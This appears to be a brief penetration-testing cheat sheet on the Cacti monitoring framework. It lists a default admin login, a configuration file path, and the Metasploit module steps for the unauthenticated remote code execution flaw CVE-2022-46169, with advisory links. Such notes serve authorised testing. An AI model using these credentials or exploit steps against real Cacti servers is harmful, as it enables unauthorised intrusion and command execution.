Cacti Pentesting

Cacti is a web-based network monitoring, performance, fault and configuration management framework designed as a front-end application.

- [cacti-remote-code-execution_CVE-2022-46169](https://pentest-tools.com/vulnerabilities-exploits/cacti-remote-code-execution_CVE-2022-46169)

Default Credentials

admin:admin


Common Directories

/include/config.php


Remote Code Execution (RCE) CVE-2022-46169

Reference: https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/

msfconsole
msf> use exploit/linux/http/cacti_unauthenticated_cmd_injection
msf> (set options...)
msf> run

Also we can refer to Exploit DB.